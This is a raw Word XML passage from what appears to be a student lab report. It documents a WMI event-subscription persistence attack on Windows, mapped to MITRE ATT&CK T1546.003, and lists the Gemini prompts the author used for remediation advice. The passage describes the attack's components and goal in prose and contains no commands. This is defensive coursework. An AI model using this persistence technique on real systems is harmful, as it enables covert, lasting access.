                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Grammarly (to correct spelling and grammar)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E03AF5" w:rsidP="002E72EC" w:rsidRDefault="00E03AF5" w14:paraId="40C90C7E" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Gemini:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="008D3E01" w:rsidR="008D3E01" w:rsidP="008D3E01" w:rsidRDefault="008D3E01" w14:paraId="1CE86107" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E03AF5" w:rsidP="00E03AF5" w:rsidRDefault="00E03AF5" w14:paraId="04A8572E" w14:textId="24F52615">
            <w:pPr>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Prompts used:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E03AF5" w:rsidP="002E72EC" w:rsidRDefault="001D2848" w14:paraId="17236F00" w14:textId="5EE2B525">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>“Tell me everything I need to know about MITRE ATT&amp;CK: Scheduled Task (T1053.005)”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="00F12651" w:rsidR="00F12651" w:rsidP="00F12651" w:rsidRDefault="00F12651" w14:paraId="3B33237D" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="001D2848" w:rsidP="002E72EC" w:rsidRDefault="0017146C" w14:paraId="302E00B2" w14:textId="02C3ACE8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>PASTED WHAT I DID TO GET PRIV ESC AND WAZUH OUTPUT AND ASKED “Above I have attached the steps I did to get privileged escalation, I have also attached the wazuh response. Remediation Strategies for this attack, elaborate everything for me, tell me everything I need to know about it, explain to me clearly. Give me all of them in paragraphs each so I can easily understand.”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="00F12651" w:rsidR="00F12651" w:rsidP="00F12651" w:rsidRDefault="00F12651" w14:paraId="70C23A49" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidRPr="00F12651" w:rsidR="00F12651" w:rsidP="00F12651" w:rsidRDefault="00F12651" w14:paraId="4F11965D" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidRPr="00E03AF5" w:rsidR="00E82CE0" w:rsidP="002E72EC" w:rsidRDefault="00E82CE0" w14:paraId="055BB87C" w14:textId="7C661D91">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>“Suggest some security controls and mitigation recommendations, give me all of them in paragraphs each so I can easily understand.”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="60662FCB" w14:textId="77777777">
      <w:pPr>
        <w:widowControl/>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="4B447548" w14:textId="77777777">
      <w:pPr>
        <w:widowControl/>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8236E" w:rsidP="6845FCFF" w:rsidRDefault="7F2C5844" w14:paraId="1C5432A2" w14:textId="60DDFC0B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896693" w:id="38"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>3.3</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Incident #003 – Permanent WMI Event Subscription Persistence (Timer-based)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w:rsidRPr="003419C9" w:rsidR="00B8236E" w:rsidP="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="652744C5" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896694" w:id="39"/>
      <w:commentRangeStart w:id="40"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:commentRangeEnd w:id="40"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="40"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1428"/>
        <w:gridCol w:w="1424"/>
        <w:gridCol w:w="1401"/>
        <w:gridCol w:w="1808"/>
        <w:gridCol w:w="1409"/>
        <w:gridCol w:w="1712"/>
      </w:tblGrid>
      <w:tr w:rsidR="3EF144FC" w:rsidTr="099E7C3F" w14:paraId="28AAFB42"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38" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3EF144FC" w:rsidP="3EF144FC" w:rsidRDefault="3EF144FC" w14:paraId="646E294F" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3EF144FC" w:rsidP="3EF144FC" w:rsidRDefault="3EF144FC" w14:paraId="322A3873"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eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1424" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3EF144FC" w:rsidP="3EF144FC" w:rsidRDefault="3EF144FC" w14:paraId="0E1EEE11"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eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Technique Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1736" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3EF144FC" w:rsidP="3EF144FC" w:rsidRDefault="3EF144FC" w14:paraId="46986772"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eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Sub-technique Name (if applicable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3EF144FC" w:rsidP="3EF144FC" w:rsidRDefault="3EF144FC" w14:paraId="6ED685C0"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eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1712" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3EF144FC" w:rsidP="3EF144FC" w:rsidRDefault="3EF144FC" w14:paraId="480F7D8F"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eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Permissions Required to perform attack (User/Admin/NIL)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="3EF144FC" w:rsidP="3EF144FC" w:rsidRDefault="3EF144FC" w14:paraId="1A78F3A2"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eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:sz w:val="20"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3EF144FC" w:rsidTr="099E7C3F" w14:paraId="2922483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38" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3EF144FC" w:rsidP="3EF144FC" w:rsidRDefault="3EF144FC" w14:paraId="53B29BFA" w14:textId="4ACFFC67">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3EF144FC" w:rsidP="3EF144FC" w:rsidRDefault="3EF144FC" w14:paraId="059CCEA1" w14:textId="018E2DE0">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eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              </w:rPr>
              <w:t>T1546.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1424" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3EF144FC" w:rsidP="3EF144FC" w:rsidRDefault="3EF144FC" w14:paraId="683B8DFB" w14:textId="419A78D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eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              </w:rPr>
              <w:t>Event Triggered Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1736" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3EF144FC" w:rsidP="099E7C3F" w:rsidRDefault="099E7C3F" w14:paraId="09F8895D" w14:textId="6DCA459A">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eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              </w:rPr>
              <w:t>Windows Management Instrumentation (WMI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3EF144FC" w:rsidP="3EF144FC" w:rsidRDefault="3EF144FC" w14:paraId="57BCE10C" w14:textId="3609BCD9">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eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              </w:rPr>
              <w:t>Windows (Windows 10/11)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1712" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3EF144FC" w:rsidP="3EF144FC" w:rsidRDefault="3EF144FC" w14:paraId="63E42440" w14:textId="06E530DC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              </w:rPr>
              <w:t>Admin (Elevated PowerShell)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="27504325" w:rsidP="27504325" w:rsidRDefault="3447F68C" w14:paraId="5274F6BF" w14:textId="7EFB548E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Technique justification:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53F6C94D" w:rsidP="53F6C94D" w:rsidRDefault="7B9F8C04" w14:paraId="1F590FD2" w14:textId="26B0C6F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This incident demonstrates T1546.003 because persistence is established through a permanent WMI event subscription in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>root\subscription</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. The attacker created an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>__EventFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (trigger), a CommandLineEventConsumer (payload execution), and a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">__FilterToConsumerBinding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(binding). This allows the system to re-execute the payload automatically on a timed trigger (every 60 seconds), including across reboots.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53F6C94D" w:rsidP="53F6C94D" w:rsidRDefault="53F6C94D" w14:paraId="7E9478B5" w14:textId="41E22E5D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED5F9B" w:rsidP="2BFA4357" w:rsidRDefault="2BFA4357" w14:paraId="01EFFF9C" w14:textId="605B4898">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896695" w:id="41"/>
      <w:commentRangeStart w:id="42"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Attack Documentation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:commentRangeEnd w:id="42"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="42"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="234EA093" w:rsidRDefault="099E7C3F" w14:paraId="018F120A" w14:textId="69336AA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Goal:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7333D4ED" w:rsidP="099E7C3F" w:rsidRDefault="099E7C3F" w14:paraId="0DD091BA" w14:textId="351BA6DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The objective of this technique is to ensure the attacker maintains long-term execution on the Windows endpoint without relying on traditional startup locations such as registry Run keys or scheduled tasks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> With WMI persistence, the payload is stored inside WMI and can run invisibly in the background based on a trigger.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="234EA093" w:rsidRDefault="234EA093" w14:paraId="2F4E269D" w14:textId="6C482B21">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="30947F66" w:rsidP="30947F66" w:rsidRDefault="30947F66" w14:paraId="6A5B833D" w14:textId="7CC1E864">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What was performed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="77AA56DF" w:rsidP="77AA56DF" w:rsidRDefault="77AA56DF" w14:paraId="2B24487D" w14:textId="53591E83">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A permanent WMI event subscription was created using three components:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="77AA56DF" w:rsidP="002E72EC" w:rsidRDefault="77AA56DF" w14:paraId="5136EA09" w14:textId="37FE4A6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
